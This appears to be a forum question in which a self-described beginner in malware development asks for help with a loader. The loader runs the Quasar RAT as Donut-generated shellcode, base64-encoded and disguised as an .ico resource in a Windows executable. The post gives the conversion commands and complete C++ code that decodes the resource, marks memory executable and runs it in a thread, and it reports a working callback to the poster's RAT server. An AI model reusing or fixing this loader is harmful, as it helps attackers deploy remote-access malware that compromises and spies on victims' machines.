I am new to malware development and I am trying to create a program to inject raw shellcode into memory and embedding it in the Resource section of the PE.
Using Donut by Wover (https://github.com/TheWover/donut), I convert the executable Quasar RAT into a raw shellcode using this command donut.exe -i Client-built.exe -a x64 and subsequently encode it to base64 using certutil by this command: certutil -encode loader.bin loader.b64 in the windows command prompt.
main.cpp:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <Wincrypt.h>
#pragma comment (lib, "Crypt32.lib")
#define SC_ICON 2583
int main() {
HANDLE hthread;
HRSRC shellcode = FindResourceW(0, MAKEINTRESOURCEW(SC_ICON), RT_RCDATA);
HGLOBAL shellcode_handle = LoadResource(0, shellcode);
LPVOID shellcode_payload = LockResource(shellcode_handle);
DWORD shellcode_size = SizeofResource(0, shellcode);
printf("[+] Allocating shellcode to memory...\n");
LPVOID pAddress = VirtualAlloc(0, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf("[+] Shellcode base address: 0x%p\n", shellcode_payload);
printf("[+] Allocated memory base address: 0x%p\n", pAddress);
printf("[+] Press enter to decode base64 shellcode & copy shellcode to allocated memory\n");
getchar();
CryptStringToBinaryA((LPCSTR)shellcode_payload, shellcode_size, CRYPT_STRING_BASE64, (BYTE*)pAddress, &shellcode_size, 0, 0);
printf("[+] Successfully copied shellcode to memory: 0x%p\n", pAddress);
DWORD old_protection = 0;
VirtualProtect(pAddress, shellcode_size, PAGE_EXECUTE_READ, &old_protection);
hthread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)pAddress, 0, 0, 0);
if (!hthread) {
printf("[+] failed to start thread!");
}
DWORD pid = GetProcessIdOfThread(hthread);
printf("[+] Process - PID: %d started !\n", pid);
WaitForSingleObject(hthread, INFINITE);
}
rsrc.rc:
#define SC_ICON 2583
SC_ICON RCDATA "loader_b64.ico"
loader_b64.ico:
Although I successfully managed to get a callback to my Quasar RAT server, some of the functions of the RAT don't seem to be working properly. I know it has something to do with the shellcode being decrypted from base64 but couldn't find a fix to it. Is there a better way to decrypt the base64 shellcode?